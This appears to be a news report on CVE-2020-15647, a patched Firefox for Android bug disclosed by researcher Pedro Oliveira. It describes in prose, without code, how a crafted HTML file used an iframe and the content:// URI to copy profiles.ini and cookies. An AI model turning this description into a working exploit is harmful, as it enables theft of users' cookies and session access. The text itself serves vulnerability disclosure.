Independent Information Security Expert Pedro Oliveira talked about the bug CVE-2020-15647, which he discovered this spring in Firefox for Android. Using a specially crafted HTML file, it was possible to steal cookies from the victim's device.
The vulnerability was in the way Firefox handles local files via the content: // URI. The exploitation of the bug made it possible to remotely obtain copies of cookies from the device, which gave an attacker access to some sites that the user viewed.
To exploit the problem, you had to convince the user to open a specific HTML file. The malicious file opened an iframe that called the content: // URI for profiles.ini, which contains the Firefox user's profile data as well as cookies. Because Firefox was handling the URI incorrectly, the researcher was able to obtain a copy of this local file, which should not be accessible via the web page.
The researcher explains that the browser redirects the content: // URI to access local files on the device to the file: // URI, indicating that it saved a copy of the requested resource in a private cache directory before loading it.
“These content: // URIs require read and write permissions to be available to other applications. When you share a URI between apps (for example, via Share with), the source app must provide permissions for that URI (before sharing). As a result, the URI has permissions when it is shared with the receiving application, and only that application can access it. However, when the application itself processes its URIs (and not other applications), these permissions are not applied, which means that the application can freely access the content, ”says Oliveira, noting that any file downloaded by Firefox prior to version 68.10.1 was processed in this way.
Since the malicious file mentioned above and the local file loaded by the exploit have the same names, a substitution occurs in the private directory. As a result, the expert explains, the attacker receives an open malicious cached file, and the original file is replaced. After the iframe is loaded, the maliciously cached file sends its content to the malicious page, where an attacker sees it. Since the path and source have not changed, no warnings are displayed.
This vulnerability was fixed back this summer, when Firefox was updated to version 68.10.1.